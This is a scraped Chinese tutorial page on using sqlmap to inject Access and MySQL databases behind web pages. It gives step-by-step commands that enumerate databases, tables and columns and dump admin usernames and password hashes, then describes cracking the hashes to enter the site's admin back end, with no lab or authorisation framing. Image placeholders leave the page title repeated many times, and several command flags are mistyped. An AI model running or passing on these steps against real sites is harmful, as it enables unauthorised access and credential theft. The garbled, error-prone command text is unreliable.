sqlmap怎么注入ACCESS数据库

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqlmap怎么注入ACCESS数据库相关的知识,希望对你有一定的参考价值。

参考技术A 方法/步骤
首先我们先来跑表
命令是sqlmap –u “url/NewsShow.asp?id=69” –tables

一路上大家遇到这个

可以直接选择回车
等到了这里

大家选择线程1到10
开始扫表。你也可以在出现admin这个表的时候按下ctrl+c就可以终止然后就获取表

然后我们直接再次输入命令sqlmap –u “url/NewsShow.asp?id=69” –colunmns –T admin

然后得到了里面的字段username password id
然后我们直接跑字段内容sqlmap –u “url/NewsShow.asp?id=69” –dumps –T admin –C “username,password”

然后一路还是回车。到了

还是选择线程1到10
最后跑出了用户名。密码

9

实战|SQL注入攻击网站


实战|SQL注入攻击网站
实战|SQL注入攻击网站
实战|SQL注入攻击网站
实战|SQL注入攻击网站
实战|SQL注入攻击网站

SQL注入

实战|SQL注入攻击网站
实战|SQL注入攻击网站
实战|SQL注入攻击网站
实战|SQL注入攻击网站
实战|SQL注入攻击网站
Access数据库攻击




SQL数据库注入

一:获取数据库类型

sqlmap -u http://xxx.com –dbs

实战|SQL注入攻击网站

获得的信息:linux服务器系统为cenos 5.10

Apacher php 的版本 数据库类型为sql

二,获取数据库中的数据库

sqlmap -u http:xxx.com --dbms mysql--level 3 –dbs

实战|SQL注入攻击网站

OK,当前数据库中有两个数据库,目测sq_kffc200为当前网站的系统!(做过网站都知道的)

三,

从当前数据库中获取表段

sqlmap -uhttp://www.xxx.com --dbmsmysql --level 3 -D sq_kyfc200 –tables

实战|SQL注入攻击网站

Ok 我们可以看到有很多表头 怎么办?

没事我们找关键字(含有admin开头的全部搞上去!)

四:获取admin表中的字段

sqlmap -u http://www.xxx.com--dbms mysql --level 3 -D sq_kyfc200 -T "boc_admin_user,boc_admin_user,ky_admin"–columns

实战|SQL注入攻击网站

获取到的表段:还是关键字password username

五,获取表和字中的密码:

sqlmap -uhttp://www.xxx.com --dbms mysql--level 3 -D sq_kyfc200 -T "boc_admin_user,boc_admin_user,ky_admin" -C"login_count,password,qq,tel" –dump

实战|SQL注入攻击网站

OK 获得MD5加密的密文 解密登录后台

获取更多原创教程 扫码关注即可


以上是关于sqlmap怎么注入ACCESS数据库的主要内容,如果未能解决你的问题,请参考以下文章

SqlMap常用参数

11种常见sqlmap使用方法

access偏移注入*过滤了怎么办

SQLMAP安装及使用教程

提高sqlmap爆破效率

实战|SQL注入攻击网站